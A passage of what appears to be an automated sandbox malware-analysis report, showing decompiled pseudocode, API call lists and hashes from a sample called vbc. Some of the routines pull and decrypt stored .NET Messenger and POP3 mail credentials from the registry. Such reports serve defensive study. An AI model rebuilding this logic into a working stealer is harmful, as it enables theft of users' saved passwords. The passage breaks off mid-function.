                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                              • String ID: \systemroot
                                                              • API String ID: 1680921474-1821301763
                                                              • Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                              • Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
                                                              • Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                              • Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E00405BE4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                                                              				void* __esi;
                                                              				intOrPtr* _t27;
                                                              				void* _t30;
                                                              				struct HWND__* _t32;
                                                              				void* _t35;
                                                              				intOrPtr* _t36;
                                                              
                                                              				_t30 = __edx;
                                                              				_t27 = __ecx;
                                                              				_push(__ebx);
                                                              				_push(__edi);
                                                              				_t32 =  *(__ecx + 4);
                                                              				_t35 = __ecx + 0xc;
                                                              				 *(_t35 + 0x10) = _t32;
                                                              				GetClientRect(_t32, _t35 + 0xa14);
                                                              				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
                                                              				GetWindow(GetWindow(_t32, 5), 0);
                                                              				do {
                                                              					__eax = E00401657(__edi, __esi);
                                                              					__edi = GetWindow(__edi, 2);
                                                              				} while (__edi != 0);
                                                              				__esi = GetDlgItem;
                                                              				__edi = 0x3ed;
                                                              				GetDlgItem( *(__ebx + 4), 0x3ed) = E0040F037(__eax);
                                                              				 *__esp = 0x3ee;
                                                              				GetDlgItem(??, ??) = E0040F037(__eax);
                                                              				 *__esp = 0x3ef;
                                                              				GetDlgItem( *(__ebx + 4),  *(__ebx + 4)) = E0040F037(__eax);
                                                              				 *__esp = 0x3f4;
                                                              				GetDlgItem( *(__ebx + 4), ??) = E0040F037(__eax);
                                                              				__eax =  *(__ebx + 4);
                                                              				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
                                                              				_pop(__edi);
                                                              				_pop(__esi);
                                                              				__ecx = __ebx;
                                                              				_pop(__ebx);
                                                              				_t36 = _t27;
                                                              				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
                                                              				 *((intOrPtr*)( *_t36 + 0x18))();
                                                              				E00406491(_t30,  *((intOrPtr*)(_t36 + 4)));
                                                              				return 0;
                                                              			}









                                                              0x00405be4
                                                              0x00405be4
                                                              0x00405be4
                                                              0x00405be9
                                                              0x00405bea
                                                              0x00405bed
                                                              0x00405bf8
                                                              0x00405bfb
                                                              0x00405c07
                                                              0x00405c16
                                                              0x00405c1a
                                                              0x00405c1a
                                                              0x00405c24
                                                              0x00405c26
                                                              0x00405c2a
                                                              0x00405c30
                                                              0x00405c3c
                                                              0x00405c41
                                                              0x00405c4e
                                                              0x00405c53
                                                              0x00405c60
                                                              0x00405c65
                                                              0x00405c72
                                                              0x00405c77
                                                              0x00405c80
                                                              0x00405c86
                                                              0x00405c87
                                                              0x00405c89
                                                              0x00405c8b
                                                              0x0040163a
                                                              0x00401640
                                                              0x00401647
                                                              0x0040164d
                                                              0x00401656

                                                              APIs
                                                              • GetClientRect.USER32 ref: 00405BFB
                                                              • GetWindow.USER32(?,00000005), ref: 00405C13
                                                              • GetWindow.USER32(00000000), ref: 00405C16
                                                                • Part of subcall function 00401657: GetWindowRect.USER32 ref: 00401666
                                                                • Part of subcall function 00401657: MapWindowPoints.USER32 ref: 00401681
                                                              • GetWindow.USER32(00000000,00000002), ref: 00405C22
                                                              • GetDlgItem.USER32 ref: 00405C39
                                                              • GetDlgItem.USER32 ref: 00405C4B
                                                              • GetDlgItem.USER32 ref: 00405C5D
                                                              • GetDlgItem.USER32 ref: 00405C6F
                                                              • GetDlgItem.USER32 ref: 00405C7D
                                                              • SetFocus.USER32(00000000), ref: 00405C80
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemWindow$Rect$ClientFocusPoints
                                                              • String ID:
                                                              • API String ID: 2187283481-0
                                                              • Opcode ID: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                              • Instruction ID: 7666b00b3ddace13e8d54cd994e266c410995bf231072ec337e33f1596805ccb
                                                              • Opcode Fuzzy Hash: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                              • Instruction Fuzzy Hash: 1A115471500304ABDB116F25CD49E6BBFADDF41758F05843AF544AB591CB79D8028A68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E00401A50(char* __edi, int __fp0) {
                                                              				void* _v8;
                                                              				intOrPtr _v12;
                                                              				void* _v16;
                                                              				void* _v20;
                                                              				int _v28;
                                                              				int _v36;
                                                              				void* _v40;
                                                              				void* _v44;
                                                              				void* _v48;
                                                              				void* _v52;
                                                              				void* _v56;
                                                              				void* _v60;
                                                              				char _v64;
                                                              				int _t79;
                                                              				intOrPtr _t80;
                                                              				int _t81;
                                                              				signed int _t94;
                                                              				int _t98;
                                                              				int _t100;
                                                              				void* _t104;
                                                              				void* _t106;
                                                              				intOrPtr _t115;
                                                              				char _t117;
                                                              				char* _t118;
                                                              				void* _t119;
                                                              				void* _t120;
                                                              				int _t122;
                                                              				signed int _t123;
                                                              				int* _t125;
                                                              				int _t159;
                                                              				int _t165;
                                                              
                                                              				_t159 = __fp0;
                                                              				_t118 = __edi;
                                                              				_t125 = (_t123 & 0xfffffff8) - 0x40;
                                                              				_t79 = strlen(__edi);
                                                              				asm("fldz");
                                                              				_t104 = 0;
                                                              				_v28 = __fp0;
                                                              				_t120 = 0;
                                                              				_t106 = _t119;
                                                              				_v36 = _t79;
                                                              				_v56 = 0;
                                                              				_v52 = 0;
                                                              				_v48 = 0;
                                                              				_v44 = 0;
                                                              				_v60 = 0;
                                                              				_v40 = 0;
                                                              				_v12 = 0x20;
                                                              				_v20 = 0;
                                                              				_v8 = 0;
                                                              				_v16 = 0;
                                                              				if(_t79 > 0) {
                                                              					do {
                                                              						_t117 =  *((intOrPtr*)(_t120 + _t118));
                                                              						_v64 = _t117;
                                                              						if(_t117 - 0x41 <= 0x19) {
                                                              							_v56 = _v56 + 1;
                                                              						}
                                                              						if(_t117 - 0x61 <= 0x19) {
                                                              							_v52 = _v52 + 1;
                                                              						}
                                                              						if(_t117 - 0x30 <= 9) {
                                                              							_v48 = _v48 + 1;
                                                              						}
                                                              						if(_t117 - 0x20 <= 0xf) {
                                                              							_v44 = _v44 + 1;
                                                              						}
                                                              						if(_t117 - 0x3a <= 6) {
                                                              							_v60 = _v60 + 1;
                                                              						}
                                                              						if(_t117 - 0x5b <= 5) {
                                                              							_v60 = _v60 + 1;
                                                              						}
                                                              						if(_t117 < 0x7b) {
                                                              							L16:
                                                              							if(_t117 > 0x7e) {
                                                              								goto L17;
                                                              							}
                                                              						} else {
                                                              							if(_t117 > 0x7e) {
                                                              								L17:
                                                              								_v40 = _v40 + 1;
                                                              							} else {
                                                              								_v60 = _v60 + 1;
                                                              								goto L16;
                                                              							}
                                                              						}
                                                              						if(_t120 != _t104) {
                                                              							_t94 = 0;
                                                              							if(_v8 <= 0) {
                                                              								L27:
                                                              								_t94 = _t94 | 0xffffffff;
                                                              							} else {
                                                              								L21:
                                                              								L21:
                                                              								if(_t94 < 0 || _t94 >= _v8) {
                                                              									_t115 = 0;
                                                              								} else {
                                                              									_t115 =  *((intOrPtr*)(_v20 + _t94));
                                                              								}
                                                              								if(_t115 == _t117) {
                                                              									goto L28;
                                                              								}
                                                              								_t94 = _t94 + 1;
                                                              								if(_t94 < _v8) {
                                                              									goto L21;
                                                              								} else {
                                                              									goto L27;
                                                              								}
                                                              							}
                                                              							L28:
                                                              							_t104 = 0;
                                                              							if(_t94 < 0) {
                                                              								E004045E8( &_v20, _v64);
                                                              								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
                                                              								_pop(_t106);
                                                              								if(_t98 != 1) {
                                                              									_t47 = _t98 - 2; // -2
                                                              									_t106 = _t47;
                                                              									if(_t106 > 3) {
                                                              										if(_t98 < 6) {
                                                              											if(_t98 > 0xa) {
                                                              												goto L40;
                                                              											}
                                                              										} else {
                                                              											if(_t98 > 0xa) {
                                                              												goto L40;
                                                              											} else {
                                                              												_t159 = _v28 +  *0x414510;
                                                              											}
                                                              											goto L41;
                                                              										}
                                                              									} else {
                                                              										_t159 = _v28 +  *0x414518;
                                                              										goto L41;
                                                              									}
                                                              								} else {
                                                              									_t165 = _v28;
                                                              									goto L30;
                                                              								}
                                                              							} else {
                                                              								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
                                                              								_t165 = _v28;
                                                              								_pop(_t106);
                                                              								if(_t100 != 0) {
                                                              									_t159 = _t165 +  *0x414520;
                                                              								} else {
                                                              									L30:
                                                              									_t159 = _t165 +  *0x414528;
                                                              								}
                                                              								goto L41;
                                                              							}
                                                              						} else {
                                                              							E004045E8( &_v20, _v64);
                                                              							L40:
                                                              							_t159 = _v28 +  *0x414508;
                                                              							L41:
                                                              							_v28 = _t159;
                                                              						}
                                                              						_t120 = _t120 + 1;
                                                              					} while (_t120 < _v36);
                                                              				}
                                                              				_v64 = _t104;
                                                              				_t80 = 0x1a;
                                                              				if(_v56 != _t104) {
                                                              					_v64 = _t80;
                                                              				}
                                                              				if(_v52 != _t104) {
                                                              					_v64 = _v64 + _t80;
                                                              				}
                                                              				if(_v48 != _t104) {
                                                              					_v64 = _v64 + 0xa;
                                                              				}
                                                              				if(_v44 != _t104) {
                                                              					_v64 = _v64 + 0x10;
                                                              				}
                                                              				if(_v60 != _t104) {
                                                              					_v64 = _v64 + 0x11;
                                                              				}
                                                              				if(_v40 != _t104) {
                                                              					_v64 = _v64 + 0x1e;
                                                              				}
                                                              				if(_v64 <= _t104) {
                                                              					if(_v20 != _t104) {
                                                              						free(_v20);
                                                              					}
                                                              					_t81 = 0;
                                                              				} else {
                                                              					asm("fild dword [esp+0xc]");
                                                              					_push(_t106);
                                                              					_push(_t106);
                                                              					 *_t125 = _t159;
                                                              					L004115B8();
                                                              					_v36 = _t159;
                                                              					 *_t125 =  *0x414500;
                                                              					L004115B8();
                                                              					asm("fdivr qword [esp+0x30]");
                                                              					asm("fistp qword [esp+0x30]");
                                                              					_t122 = _v28;
                                                              					if(_v20 != _t104) {
                                                              						free(_v20);
                                                              					}
                                                              					_t81 = _t122;
                                                              				}
                                                              				return _t81;
                                                              			}


































                                                              0x00401a50
                                                              0x00401a50
                                                              0x00401a56
                                                              0x00401a5c
                                                              0x00401a61
                                                              0x00401a63
                                                              0x00401a65
                                                              0x00401a69
                                                              0x00401a6d
                                                              0x00401a6e
                                                              0x00401a72
                                                              0x00401a76
                                                              0x00401a7a
                                                              0x00401a7e
                                                              0x00401a82
                                                              0x00401a86
                                                              0x00401a8a
                                                              0x00401a92
                                                              0x00401a96
                                                              0x00401a9a
                                                              0x00401a9e
                                                              0x00401aa4
                                                              0x00401aa4
                                                              0x00401aad
                                                              0x00401ab1
                                                              0x00401ab3
                                                              0x00401ab3
                                                              0x00401abd
                                                              0x00401abf
                                                              0x00401abf
                                                              0x00401ac9
                                                              0x00401acb
                                                              0x00401acb
                                                              0x00401ad5
                                                              0x00401ad7
                                                              0x00401ad7
                                                              0x00401ae1
                                                              0x00401ae3
                                                              0x00401ae3
                                                              0x00401aed
                                                              0x00401aef
                                                              0x00401aef
                                                              0x00401af6
                                                              0x00401b01
                                                              0x00401b04
                                                              0x00000000
                                                              0x00000000
                                                              0x00401af8
                                                              0x00401afb
                                                              0x00401b06
                                                              0x00401b06
                                                              0x00401afd
                                                              0x00401afd
                                                              0x00000000
                                                              0x00401afd
                                                              0x00401afb
                                                              0x00401b0c
                                                              0x00401b20
                                                              0x00401b26
                                                              0x00401b48
                                                              0x00401b48
                                                              0x00401b28
                                                              0x00000000
                                                              0x00401b28
                                                              0x00401b2a
                                                              0x00401b3b
                                                              0x00401b32
                                                              0x00401b36
                                                              0x00401b36
                                                              0x00401b3f
                                                              0x00000000
                                                              0x00000000
                                                              0x00401b41
                                                              0x00401b46
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00401b46
                                                              0x00401b4b
                                                              0x00401b4b
                                                              0x00401b4f
                                                              0x00401b82
                                                              0x00401b93
                                                              0x00401b9b
                                                              0x00401b9c
                                                              0x00401ba4
                                                              0x00401ba4
                                                              0x00401baa
                                                              0x00401bbb
                                                              0x00401bd1
                                                              0x00000000
                                                              0x00000000
                                                              0x00401bbd
                                                              0x00401bc0
                                                              0x00000000
                                                              0x00401bc2
                                                              0x00401bc6
                                                              0x00401bc6
                                                              0x00000000
                                                              0x00401bc0
                                                              0x00401bac
                                                              0x00401bb0
                                                              0x00000000
                                                              0x00401bb0
                                                              0x00401b9e
                                                              0x00401b9e
                                                              0x00000000
                                                              0x00401b9e
                                                              0x00401b51
                                                              0x00401b5c
                                                              0x00401b63
                                                              0x00401b67
                                                              0x00401b68
                                                              0x00401b72
                                                              0x00401b6a
                                                              0x00401b6a
                                                              0x00401b6a
                                                              0x00401b6a
                                                              0x00000000
                                                              0x00401b68
                                                              0x00401b0e
                                                              0x00401b16
                                                              0x00401bd3
                                                              0x00401bd7
                                                              0x00401bdd
                                                              0x00401bdd
                                                              0x00401bdd
                                                              0x00401be1
                                                              0x00401be2
                                                              0x00401aa4
                                                              0x00401bf2
                                                              0x00401bf6
                                                              0x00401bf7
                                                              0x00401bf9
                                                              0x00401bf9
                                                              0x00401c01
                                                              0x00401c03
                                                              0x00401c03
                                                              0x00401c0b
                                                              0x00401c0d
                                                              0x00401c0d
                                                              0x00401c16
                                                              0x00401c18
                                                              0x00401c18
                                                              0x00401c21
                                                              0x00401c23
                                                              0x00401c23
                                                              0x00401c2c
                                                              0x00401c2e
                                                              0x00401c2e
                                                              0x00401c37
                                                              0x00401c83
                                                              0x00401c89
                                                              0x00401c8e
                                                              0x00401c8f
                                                              0x00401c39
                                                              0x00401c39
                                                              0x00401c3d
                                                              0x00401c3e
                                                              0x00401c3f
                                                              0x00401c42
                                                              0x00401c47
                                                              0x00401c51
                                                              0x00401c54
                                                              0x00401c5d
                                                              0x00401c67
                                                              0x00401c6b
                                                              0x00401c6f
                                                              0x00401c75
                                                              0x00401c7a
                                                              0x00401c7b
                                                              0x00401c7b
                                                              0x00401c96

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: free$strlen
                                                              • String ID:
                                                              • API String ID: 667451143-3916222277
                                                              • Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                              • Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
                                                              • Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                              • Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040D4A6(char* __ebx, void** _a4) {
                                                              				int _v8;
                                                              				int _v12;
                                                              				int _v16;
                                                              				void* _v20;
                                                              				int _v24;
                                                              				char* _v28;
                                                              				char _v32;
                                                              				char _v556;
                                                              				char _v557;
                                                              				char _v1578;
                                                              				void _v1580;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				long _t39;
                                                              				int _t43;
                                                              				char _t48;
                                                              				char* _t63;
                                                              				int* _t67;
                                                              
                                                              				_t63 = __ebx;
                                                              				_t67 = 0;
                                                              				_v16 = 0;
                                                              				_v12 = 0x400;
                                                              				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
                                                              				if(_t39 != 0) {
                                                              					L13:
                                                              					RegCloseKey( *_a4);
                                                              					return _v16;
                                                              				}
                                                              				_t43 = _t39 + 1;
                                                              				if(_v12 <= _t43) {
                                                              					goto L13;
                                                              				}
                                                              				_t74 = _v1580 - 0x20;
                                                              				_v8 = 0;
                                                              				if(_v1580 >= 0x20) {
                                                              					_v8 = _t43;
                                                              					L10:
                                                              					if(_v8 != _t67) {
                                                              						_v557 = 0;
                                                              						E00401380( &_v1580,  &(_t63[0x100]), 0xff);
                                                              						_v8 = 0xff;
                                                              						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
                                                              						if(_t48 == 0) {
                                                              							_t63[0xfe] = _t48;
                                                              							_t63[0x1fe] = _t48;
                                                              							_v16 = 1;
                                                              						}
                                                              					}
                                                              					goto L13;
                                                              				}
                                                              				_t69 =  &_v556;
                                                              				E004046D7( &_v556);
                                                              				if(E004047A0(_t69, _t74) == 0) {
                                                              					L8:
                                                              					E004047F1( &_v556);
                                                              					_t67 = 0;
                                                              					goto L10;
                                                              				}
                                                              				_v32 = _v12 + 0xfffffffe;
                                                              				_v28 =  &_v1578;
                                                              				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
                                                              					goto L8;
                                                              				}
                                                              				if(_v24 < 0x400) {
                                                              					memcpy( &_v1580, _v20, _v24);
                                                              					_v8 = 1;
                                                              				}
                                                              				LocalFree(_v20);
                                                              				goto L8;
                                                              			}





















                                                              0x0040d4a6
                                                              0x0040d4bf
                                                              0x0040d4cf
                                                              0x0040d4d2
                                                              0x0040d4d5
                                                              0x0040d4dd
                                                              0x0040d5c7
                                                              0x0040d5cc
                                                              0x0040d5d8
                                                              0x0040d5d8
                                                              0x0040d4e3
                                                              0x0040d4e7
                                                              0x00000000
                                                              0x00000000
                                                              0x0040d4ed
                                                              0x0040d4f4
                                                              0x0040d4f7
                                                              0x0040d56d
                                                              0x0040d570
                                                              0x0040d573
                                                              0x0040d587
                                                              0x0040d58e
                                                              0x0040d5a7
                                                              0x0040d5aa
                                                              0x0040d5b2
                                                              0x0040d5b4
                                                              0x0040d5ba
                                                              0x0040d5c0
                                                              0x0040d5c0
                                                              0x0040d5b2
                                                              0x00000000
                                                              0x0040d573
                                                              0x0040d4f9
                                                              0x0040d4ff
                                                              0x0040d50b
                                                              0x0040d55e
                                                              0x0040d564
                                                              0x0040d569
                                                              0x00000000
                                                              0x0040d569
                                                              0x0040d513
                                                              0x0040d51c
                                                              0x0040d532
                                                              0x00000000
                                                              0x00000000
                                                              0x0040d537
                                                              0x0040d546
                                                              0x0040d54e
                                                              0x0040d54e
                                                              0x0040d558
                                                              0x00000000

                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,75D6F420), ref: 0040D4D5
                                                              • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                              • memcpy.MSVCRT ref: 0040D546
                                                              • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                              • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                              • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                              • API String ID: 3289975857-105384665
                                                              • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                              • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                              • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                              • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 89%
                                                              			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
                                                              				char _v12;
                                                              				short* _v16;
                                                              				char _v20;
                                                              				char* _v24;
                                                              				char _v28;
                                                              				char _v288;
                                                              				char _v544;
                                                              				char _v800;
                                                              				char _v1056;
                                                              				char _v1584;
                                                              				void _v2607;
                                                              				char _v2608;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t36;
                                                              				void* _t63;
                                                              				char* _t66;
                                                              				void* _t68;
                                                              
                                                              				_t63 = __ecx;
                                                              				_v2608 = 0;
                                                              				memset( &_v2607, 0, 0x3ff);
                                                              				_v12 = 0x400;
                                                              				_v1056 = 0;
                                                              				_v800 = 0;
                                                              				_v544 = 0;
                                                              				_v288 = 0;
                                                              				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
                                                              				_t72 = _t36;
                                                              				if(_t36 != 0) {
                                                              					return _t36;
                                                              				}
                                                              				_t67 =  &_v1584;
                                                              				E004046D7( &_v1584);
                                                              				if(E004047A0( &_v1584, _t72) != 0) {
                                                              					_v24 =  &_v2608;
                                                              					_v28 = _v12;
                                                              					_t16 =  &_v20; // 0x407221
                                                              					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
                                                              						_t19 =  &_v20; // 0x407221
                                                              						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
                                                              						LocalFree(_v16);
                                                              						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
                                                              						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
                                                              						_t28 =  &_a12; // 0x407221
                                                              						_t66 =  &_v1056;
                                                              						E004060D0(0xff, _t66,  *_t28);
                                                              						 *((intOrPtr*)( *_a4))(_t66);
                                                              					}
                                                              				}
                                                              				return E004047F1( &_v1584);
                                                              			}






















                                                              0x0040706c
                                                              0x00407087
                                                              0x0040708d
                                                              0x004070a5
                                                              0x004070ac
                                                              0x004070b2
                                                              0x004070b8
                                                              0x004070be
                                                              0x004070c4
                                                              0x004070cc
                                                              0x004070ce
                                                              0x00407199
                                                              0x00407199
                                                              0x004070d4
                                                              0x004070da
                                                              0x004070e6
                                                              0x004070f2
                                                              0x004070f8
                                                              0x004070fb
                                                              0x0040710d
                                                              0x0040711d
                                                              0x00407131
                                                              0x00407138
                                                              0x00407154
                                                              0x0040716a
                                                              0x0040716f
                                                              0x00407172
                                                              0x00407178
                                                              0x00407188
                                                              0x00407188
                                                              0x0040710d
                                                              0x00000000

                                                              APIs
                                                              • memset.MSVCRT ref: 0040708D
                                                                • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,75D6ED80,?), ref: 00407138
                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                              • String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
                                                              • API String ID: 604216836-250559020
                                                              • Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                              • Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
                                                              • Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                              • Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 68%
                                                              			E00405E46(long __edi, char* _a4) {
                                                              				char _v8;
                                                              				void* _t8;
                                                              				void* _t10;
                                                              				long _t14;
                                                              				long _t24;
                                                              
                                                              				_t24 = __edi;
                                                              				_t1 = _t24 - 0x834; // -2100
                                                              				_t8 = 0;
                                                              				_t14 = 0x1100;
                                                              				if(_t1 <= 0x383) {
                                                              					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
                                                              					if(0 != 0) {
                                                              						_t14 = 0x1900;
                                                              					}
                                                              				}
                                                              				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                              					_t10 = strcpy(_a4, "Unknown Error");
                                                              				} else {
                                                              					if(strlen(_v8) < 0x400) {
                                                              						strcpy(_a4, _v8);
                                                              					}
                                                              					_t10 = LocalFree(_v8);
                                                              				}
                                                              				return _t10;
                                                              			}








                                                              0x00405e46
                                                              0x00405e4c
                                                              0x00405e54
                                                              0x00405e5c
                                                              0x00405e61
                                                              0x00405e6b
                                                              0x00405e73
                                                              0x00405e75
                                                              0x00405e75
                                                              0x00405e73
                                                              0x00405e91
                                                              0x00405ec0
                                                              0x00405e93
                                                              0x00405e9e
                                                              0x00405ea6
                                                              0x00405eac
                                                              0x00405eb0
                                                              0x00405eb0
                                                              0x00405eca

                                                              APIs
                                                              • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
                                                              • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
                                                              • strlen.MSVCRT ref: 00405E96
                                                              • strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
                                                              • LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
                                                              • strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                              • String ID: Unknown Error$netmsg.dll
                                                              • API String ID: 3198317522-572158859
                                                              • Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                              • Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
                                                              • Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                              • Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E0040875C(void* __eax, void* __eflags, signed int _a4, short _a8) {
                                                              				char _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t96;
                                                              				signed int _t98;
                                                              				void* _t99;
